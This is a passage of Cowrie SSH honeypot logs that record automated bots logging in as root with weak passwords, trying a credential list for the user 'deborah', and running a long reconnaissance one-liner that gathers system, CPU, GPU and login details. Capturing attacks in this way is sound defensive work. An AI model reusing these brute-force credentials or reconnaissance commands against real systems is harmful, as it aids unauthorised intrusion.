an-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:12:02.903980Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:12:03.404826Z","src_ip":"27.112.79.123","session":"8a826b81a6c4"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:12:03.573196Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:03.674506Z","src_ip":"27.112.79.123","session":"baf36edb6ba5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:03.676973Z","src_ip":"27.112.79.123","session":"8a826b81a6c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:12:04.129458Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.130235Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.130844Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.131861Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.132982Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.133749Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.134621Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.135664Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.136240Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.136796Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.137247Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.137971Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.138415Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.330889Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.332192Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:04.333364Z","src_ip":"212.227.125.160","session":"6d2aada475e2"}
{"eventid":"cowrie.session.closed","duration":39.29357051849365,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:19.429388Z","src_ip":"212.227.125.160","session":"7b2d262d7a81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45034,"dst_ip":"1.2.3.4","dst_port":22,"session":"a939d071667a","protocol":"ssh","message":"New connection: 212.227.235.229:45034 (1.2.3.4:22) [session: a939d071667a]","sensor":"my-vps","timestamp":"2025-08-28T11:12:22.912819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:12:22.923969Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:12:23.143810Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.201720Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:12:24.756079Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.756788Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.757398Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.758537Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.759513Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.760336Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.761075Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.762060Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.762571Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.763162Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.763710Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.764451Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.764806Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T11:12:24.999452Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:25.000479Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:25.001761Z","src_ip":"212.227.235.229","session":"a939d071667a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63222,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8d87bf0d2ee","protocol":"ssh","message":"New connection: 212.227.235.229:63222 (1.2.3.4:22) [session: e8d87bf0d2ee]","sensor":"my-vps","timestamp":"2025-08-28T11:12:27.275013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:12:27.275696Z","src_ip":"212.227.235.229","session":"e8d87bf0d2ee"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:12:27.448944Z","src_ip":"212.227.235.229","session":"e8d87bf0d2ee"}
{"eventid":"cowrie.login.failed","username":"deborah","password":"deborah","message":"login attempt [deborah/deborah] failed","sensor":"my-vps","timestamp":"2025-08-28T11:12:28.792192Z","src_ip":"212.227.235.229","session":"e8d87bf0d2ee"}
{"eventid":"cowrie.login.failed","username":"deborah","password":"deborah1","message":"login attempt [deborah/deborah1] failed","sensor":"my-vps","timestamp":"2025-08-28T11:12:30.529626Z","src_ip":"212.227.235.229","session":"e8d87bf0d2ee"}
{"eventid":"cowrie.login.failed","username":"deborah","password":"deborah123","message":"login attempt [deborah/deborah123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:12:31.695959Z","src_ip":"212.227.235.229","session":"e8d87bf0d2ee"}
{"eventid":"cowrie.login.failed","username":"deborah","password":"deborah1234","message":"login attempt [deborah/deborah1234] failed","sensor":"my-vps","timestamp":"2025-08-28T11:12:32.862899Z","src_ip":"212.227.235.229","session":"e8d87bf0d2ee"}
{"eventid":"cowrie.login.failed","username":"deborah","password":"deborah12345","message":"login attempt [deborah/deborah12345] failed","sensor":"my-vps","timestamp":"2025-08-28T11:12:34.032224Z","src_ip":"212.227.235.229","session":"e8d87bf0d2ee"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:12:35.674916Z","src_ip":"212.227.235.229","session":"e8d87bf0d2ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57662,"dst_ip":"1.2.3.4","dst_port":22,"session":"2110fb6531ed","protocol":"ssh","message":"New connection: 212.227.125.160:57662 (1.2.3.4:22) [session: 2110fb6531ed]","sensor":"my-vps","timestamp":"2025-08-28T11:12:55.925439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:12:55.983233Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:12:56.089904Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:12:56.741359Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:12:57.660709Z","src_ip":"212.227.125.160","session":"2110fb6531ed"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 